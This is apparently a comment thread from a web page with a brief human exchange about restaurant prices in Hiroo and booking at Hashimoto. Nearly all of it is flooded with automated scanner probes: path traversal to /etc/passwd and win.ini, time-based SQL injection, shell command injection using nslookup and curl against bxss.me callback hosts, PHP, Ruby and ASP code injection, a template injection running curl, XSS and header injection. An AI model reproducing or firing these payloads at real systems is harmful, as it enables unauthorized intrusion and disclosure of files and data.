/../..//../..//../..//../..//../..//etc/passwd%00.jpg
re: guest
'+'A'.concat(70-3).concat(22*4).concat(119).concat(89).concat(114).concat(80)+(require'socket'
Socket.gethostbyname('hitya'+'puvxmkuvcb2c2.bxss.me.')[3].to_s)+'
re: guest
echo iuzurm$()\ vfpiiu\nz^xyu||a #' &echo iuzurm$()\ vfpiiu\nz^xyu||a #|" &echo iuzurm$()\ vfpiiu\nz^xyu||a #
re: guest
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
re: guest
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
re: guest
&echo osufsr$()\ xginan\nz^xyu||a #' &echo osufsr$()\ xginan\nz^xyu||a #|" &echo osufsr$()\ xginan\nz^xyu||a #
re: guest
/etc/passwd
re: guest
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
re: guest
|echo xutpez$()\ qgckqx\nz^xyu||a #' |echo xutpez$()\ qgckqx\nz^xyu||a #|" |echo xutpez$()\ qgckqx\nz^xyu||a #
re: guest
%2fetc%2fpasswd
re: guest
'"
re: guest
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: guest
Http://bxss.me/t/fit.txt
re: guest
(nslookup hityueeiirmft72aee.bxss.me||perl -e "gethostbyname('hityueeiirmft72aee.bxss.me')")
re: guest
/.././.././.././.././.././.././.././../etc/./passwd%00
re: guest
<!--
re: guest
';print(md5(31337));$a='
re: guest
http://bxss.me/t/fit.txt%3F.jpg
re: guest
$(nslookup hitbcovjaearia5af6.bxss.me||perl -e "gethostbyname('hitbcovjaearia5af6.bxss.me')")
re: guest
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
re: guest
";print(md5(31337));$a="
re: guest
/etc/shells
re: guest
&nslookup hitekzlvmjnow9b51a.bxss.me&'\"`0&nslookup hitekzlvmjnow9b51a.bxss.me&`'
re: guest
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
re: guest
${@print(md5(31337))}
re: guest
c:/windows/win.ini
re: guest
&(nslookup hitlswfhmlnbv14739.bxss.me||perl -e "gethostbyname('hitlswfhmlnbv14739.bxss.me')")&'\"`0&(nslookup hitlswfhmlnbv14739.bxss.me||perl -e "gethostbyname('hitlswfhmlnbv14739.bxss.me')")&`'
re: guest
../././../././../././../././../././../././../././../././../././../././etc/passwd
re: guest
${@print(md5(31337))}\
re: guest
bxss.me
re: guest
|(nslookup hitdjowhmdqox0484b.bxss.me||perl -e "gethostbyname('hitdjowhmdqox0484b.bxss.me')")
re: guest
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
re: guest
'.print(md5(31337)).'
re: guest
`(nslookup hitvasiywdnmse979b.bxss.me||perl -e "gethostbyname('hitvasiywdnmse979b.bxss.me')")`
re: guest
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
re: guest
;(nslookup hitphxmatmglgdafad.bxss.me||perl -e "gethostbyname('hitphxmatmglgdafad.bxss.me')")|(nslookup hitphxmatmglgdafad.bxss.me||perl -e "gethostbyname('hitphxmatmglgdafad.bxss.me')")&(nslookup hitphxmatmglgdafad.bxss.me||perl -e "gethostbyname('hitphxmatmglgdafad.bxss.me')")
re: guest
file:///etc/passwd
re: guest
/\../\../\../\../\../\../\../etc/passwd
re: guest
/WEB-INF/web.xml
re: guest
C:\WINDOWS\system32\drivers\etc\hosts
re: guest
../../../../../../../../../../windows/win.ini%00.jpg
re: guest
/../../../../../../../../../../boot.ini
re: guest
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
re: guest
..\..\..\..\..\..\..\..\windows\win.ini
re: guest
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
re: guest
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
re: guest
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
re: guest
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
re: guest
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
re: guest
WEB-INF/web.xml
re: guest
WEB-INF\web.xml
re: guest
1
re: guest
1
re: guest
-1 OR 2+758-758-1=0+0+0+1 --
re: guest
-1 OR 3+758-758-1=0+0+0+1 --
re: guest
-1 OR 2+643-643-1=0+0+0+1
re: guest
-1 OR 3+643-643-1=0+0+0+1
re: guest
-1' OR 2+693-693-1=0+0+0+1 --
re: guest
-1' OR 3+693-693-1=0+0+0+1 --
re: guest
-1' OR 2+750-750-1=0+0+0+1 or 'KvoWJCrK'='
re: guest
-1' OR 3+750-750-1=0+0+0+1 or 'KvoWJCrK'='
re: guest
-1" OR 2+76-76-1=0+0+0+1 --
re: guest
-1" OR 3+76-76-1=0+0+0+1 --
re: guest
if(now()=sysdate(),sleep(15),0)
re: guest
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: guest
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: guest
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: guest
-1; waitfor delay '0:0:15' --
re: guest
-1); waitfor delay '0:0:15' --
re: guest
1 waitfor delay '0:0:15' --
re: guest
lJucTcg5'; waitfor delay '0:0:15' --
re: guest
-5 OR 271=(SELECT 271 FROM PG_SLEEP(15))--
re: guest
-5) OR 880=(SELECT 880 FROM PG_SLEEP(15))--
re: guest
-1)) OR 778=(SELECT 778 FROM PG_SLEEP(15))--
re: guest
QsqBlCWa' OR 365=(SELECT 365 FROM PG_SLEEP(15))--
re: guest
zELtNmdo') OR 347=(SELECT 347 FROM PG_SLEEP(15))--
re: guest
aq6sGl6t')) OR 429=(SELECT 429 FROM PG_SLEEP(15))--
re: guest
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: guest
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: guest
'||(select 1 from (select pg_sleep(15))x)||'
re: guest
''||(select 1 from (select pg_sleep(15))x)||''
re: guest
1'"
re: guest
@@Ngc2P
re: guest
1BCZLYR5C30
re: guest
response.write(9095155*9534902)
re: guest
'+response.write(9095155*9534902)+'
re: guest
"+response.write(9095155*9534902)+"
re: guest
../../../../../../../../../../../../../../etc/passwd
re: guest
<esi:include src="http://bxss.me/rpb.png"/>
re: guest
../../../../../../../../../../../../../../windows/win.ini
re: guest
${9999300+9999602}
re: guest
file:///etc/passwd
re: guest
../
re: guest
)
re: guest
!(()&&!|*|*|
re: guest
^(#$!@#$)(()))******
re: guest
redirtest.acx
re: guest
ctime
sleep
p0
(I30
tp1
Rp2
.
re: guest
echo lhpazi$()\ popbxj\nz^xyu||a #' &echo lhpazi$()\ popbxj\nz^xyu||a #|" &echo lhpazi$()\ popbxj\nz^xyu||a #
re: guest
'.gethostbyname(lc('hitup'.'ycxipypwd910c.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(104).chr(89).chr(104).chr(74).'
re: guest
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
re: guest
".gethostbyname(lc("hityq"."rctwufxt8595d.bxss.me."))."A".chr(67).chr(hex("58")).chr(105).chr(78).chr(104).chr(81)."
re: guest
&echo nvlswn$()\ kdyobl\nz^xyu||a #' &echo nvlswn$()\ kdyobl\nz^xyu||a #|" &echo nvlswn$()\ kdyobl\nz^xyu||a #
re: guest
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs�.jpg
re: guest
gethostbyname(lc('hitgg'.'hmftxoqm1158b.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(112).chr(78).chr(113).chr(78)
re: guest
|echo iggsfj$()\ kntjyi\nz^xyu||a #' |echo iggsfj$()\ kntjyi\nz^xyu||a #|" |echo iggsfj$()\ kntjyi\nz^xyu||a #
re: guest
/etc/shells
re: guest
expr 9000610239 - 951973
re: guest
../../../../../../../../../../../../../../etc/shells
re: guest
(nslookup -q=cname hitdemqyumcwp29243.bxss.me||curl hitdemqyumcwp29243.bxss.me))
re: guest
c:/windows/win.ini
re: guest
$(nslookup -q=cname hitwcikietwsnf0324.bxss.me||curl hitwcikietwsnf0324.bxss.me)
re: guest
bxss.me
re: guest
&nslookup -q=cname hitfbxunbueys30dfa.bxss.me&'\"`0&nslookup -q=cname hitfbxunbueys30dfa.bxss.me&`'
re: guest
Http://bxss.me/t/fit.txt
re: guest
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: guest
&(nslookup -q=cname hitgcytamwkifa221b.bxss.me||curl hitgcytamwkifa221b.bxss.me)&'\"`0&(nslookup -q=cname hitgcytamwkifa221b.bxss.me||curl hitgcytamwkifa221b.bxss.me)&`'
re: guest
http://bxss.me/t/fit.txt?.jpg
re: guest
';print(md5(31337));$a='
re: guest
HttP://bxss.me/t/xss.html?%00
re: guest
|(nslookup -q=cname hitclqscfdapfb52ae.bxss.me||curl hitclqscfdapfb52ae.bxss.me)
re: guest
'"()
re: guest
";print(md5(31337));$a="
re: guest
bxss.me/t/xss.html?%00
re: guest
`(nslookup -q=cname hitxeappbpooue40a9.bxss.me||curl hitxeappbpooue40a9.bxss.me)`
re: guest
'&&sleep(27*1000)*ttkynq&&'
re: guest
${@print(md5(31337))}
re: guest
;(nslookup -q=cname hitpqfnmnnlnzc43b9.bxss.me||curl hitpqfnmnnlnzc43b9.bxss.me)|(nslookup -q=cname hitpqfnmnnlnzc43b9.bxss.me||curl hitpqfnmnnlnzc43b9.bxss.me)&(nslookup -q=cname hitpqfnmnnlnzc43b9.bxss.me||curl hitpqfnmnnlnzc43b9.bxss.me)
re: guest
"&&sleep(27*1000)*oupmzl&&"
re: guest
${@print(md5(31337))}\
re: guest
|(nslookup${IFS}-q${IFS}cname${IFS}hitxgrecccmwm25eec.bxss.me||curl${IFS}hitxgrecccmwm25eec.bxss.me)
re: guest
'||sleep(27*1000)*tuxehl||'
re: guest
"+"A".concat(70-3).concat(22*4).concat(102).concat(74).concat(117).concat(86)+(require"socket"
Socket.gethostbyname("hittl"+"qfebwpegadd79.bxss.me.")[3].to_s)+"
re: guest
'.print(md5(31337)).'
re: guest
&(nslookup${IFS}-q${IFS}cname${IFS}hitvbmodetfghf7bbe.bxss.me||curl${IFS}hitvbmodetfghf7bbe.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitvbmodetfghf7bbe.bxss.me||curl${IFS}hitvbmodetfghf7bbe.bxss.me)&`'
re: guest
"||sleep(27*1000)*yqbyes||"
re: guest
'+'A'.concat(70-3).concat(22*4).concat(97).concat(75).concat(122).concat(76)+(require'socket'
Socket.gethostbyname('hiteq'+'ufxeqoya0a163.bxss.me.')[3].to_s)+'
re: guest
'A'.concat(70-3).concat(22*4).concat(100).concat(85).concat(116).concat(70)+(require'socket'
Socket.gethostbyname('hitqi'+'mrtskdml14c5d.bxss.me.')[3].to_s)
re: guest
replies
re: guest
replies�
re: guest
replies/.
re: guest
'"
re: guest
<!--
re: guest
'"()&%<zzz><ScRiPt >qKu1(9810)</ScRiPt>
re: guest
{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("curl hityzortrjejh6080e.bxss.me")}}
re: guest
'"()&%<zzz><ScRiPt >qKu1(9813)</ScRiPt>
re: guest
9153831
re: guest
cONzycgu
re: guest
*1
re: guest
*1
re: guest
*1
re: guest
*1
re: guest
-1 OR 5*5=25 --
re: guest
-1 OR 5*5=26 --
re: guest
-1 OR 5*5=25
re: guest
-1 OR 5*5=26
re: guest
*if(now()=sysdate(),sleep(15),0)
re: guest
0'XOR(
*if(now()=sysdate(),sleep(15),0))XOR'Z
re: guest
0"XOR(
*if(now()=sysdate(),sleep(15),0))XOR"Z
re: guest
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: guest
-1; waitfor delay '0:0:15' --
re: guest
-1); waitfor delay '0:0:15' --
re: guest
-1 waitfor delay '0:0:15' --
re: guest
3psfvVd6'; waitfor delay '0:0:15' --
re: guest
-1 OR 495=(SELECT 495 FROM PG_SLEEP(15))--
re: guest
-1) OR 623=(SELECT 623 FROM PG_SLEEP(15))--
re: guest
-1)) OR 304=(SELECT 304 FROM PG_SLEEP(15))--
re: guest
ojVi4Hnx' OR 724=(SELECT 724 FROM PG_SLEEP(15))--
re: guest
ZGr9ZD19') OR 159=(SELECT 159 FROM PG_SLEEP(15))--
re: guest
6GkV8KZ5')) OR 357=(SELECT 357 FROM PG_SLEEP(15))--
re: guest
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: guest
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: guest
'||(select 1 from (select pg_sleep(15))x)||'
re: guest
''||(select 1 from (select pg_sleep(15))x)||''
re: guest
'"
re: guest
@@PM40N
re: guest
(select 198766*667891)
re: guest
(select 198766*667891 from DUAL)
Will Tokiwa's price triple in Hiroo, or just double? :D
Thanks for sharing this link though. Quite notable to me that Hashimoto is now in the "easy to book" department.
re: kk1337
1iZFYNz44O
re: kk1337
response.write(9885763*9204834)
re: kk1337
'+response.write(9885763*9204834)+'
re: kk1337
%0abcc:074625.67-22117.67.b2c6a.19990.2@bxss.me
re: kk1337
"+response.write(9885763*9204834)+"
re: kk1337
to@example.com>%0d%0abcc:074625.67-22118.67.b2c6a.19990.2@bxss.me
re: kk1337
<esi:include src="http://bxss.me/rpb.png"/>
re: kk1337
../../../../../../../../../../../../../../etc/passwd
re: kk1337
${9999952+9999842}
re: kk1337
../../../../../../../../../../../../../../windows/win.ini
re: kk1337
file:///etc/passwd
re: kk1337
../../../../../../../../../../../../../../../proc/version
re: kk1337
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
re: kk1337
../../../../../../../../../../etc/passwd%00.jpg
re: kk1337
)
re: kk1337
'.gethostbyname(lc('hitiv'.'neuqbwrk0224d.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(116).chr(66).chr(118).chr(70).'
re: kk1337
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
re: kk1337
!(()&&!|*|*|
re: kk1337
".gethostbyname(lc("hitqc"."ggtojilz4fd15.bxss.me."))."A".chr(67).chr(hex("58")).chr(115).chr(74).chr(109).chr(84)."
re: kk1337
/../..//../..//../..//../..//../..//etc/passwd%00.jpg
re: kk1337
^(#$!@#$)(()))******
re: kk1337
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
re: kk1337
/etc/passwd
re: kk1337
echo xlcxmi$()\ ongycg\nz^xyu||a #' &echo xlcxmi$()\ ongycg\nz^xyu||a #|" &echo xlcxmi$()\ ongycg\nz^xyu||a #
re: kk1337
%2fetc%2fpasswd
re: kk1337
HttP://bxss.me/t/xss.html?%00
re: kk1337
&echo pudvxd$()\ oscmdv\nz^xyu||a #' &echo pudvxd$()\ oscmdv\nz^xyu||a #|" &echo pudvxd$()\ oscmdv\nz^xyu||a #
re: kk1337
/.././.././.././.././.././.././.././../etc/./passwd%00
re: kk1337
bxss.me/t/xss.html?%00
re: kk1337
|echo icfnui$()\ qituie\nz^xyu||a #' |echo icfnui$()\ qituie\nz^xyu||a #|" |echo icfnui$()\ qituie\nz^xyu||a #
re: kk1337
"+"A".concat(70-3).concat(22*4).concat(97).concat(82).concat(104).concat(66)+(require"socket"
Socket.gethostbyname("hitta"+"ahegudiy14f80.bxss.me.")[3].to_s)+"
re: kk1337
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
re: kk1337
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
re: kk1337
(nslookup hitmpmhsrwdfm44ab4.bxss.me||perl -e "gethostbyname('hitmpmhsrwdfm44ab4.bxss.me')")
re: kk1337
'+'A'.concat(70-3).concat(22*4).concat(104).concat(85).concat(116).concat(75)+(require'socket'
Socket.gethostbyname('hitnx'+'bqdusegyc9c7c.bxss.me.')[3].to_s)+'
re: kk1337
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
re: kk1337
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
re: kk1337
$(nslookup hitqqcmcwjuvq5540e.bxss.me||perl -e "gethostbyname('hitqqcmcwjuvq5540e.bxss.me')")
re: kk1337
../././../././../././../././../././../././../././../././../././../././etc/passwd
re: kk1337
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
re: kk1337
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: kk1337
&nslookup hitwjugshktgmfda73.bxss.me&'\"`0&nslookup hitwjugshktgmfda73.bxss.me&`'
re: kk1337
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
re: kk1337
Http://bxss.me/t/fit.txt
re: kk1337
'"
re: kk1337
';print(md5(31337));$a='
re: kk1337
&(nslookup hitbtgvphcdrbe6735.bxss.me||perl -e "gethostbyname('hitbtgvphcdrbe6735.bxss.me')")&'\"`0&(nslookup hitbtgvphcdrbe6735.bxss.me||perl -e "gethostbyname('hitbtgvphcdrbe6735.bxss.me')")&`'
re: kk1337
invalid../../../../../../../../../../etc/passwd/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.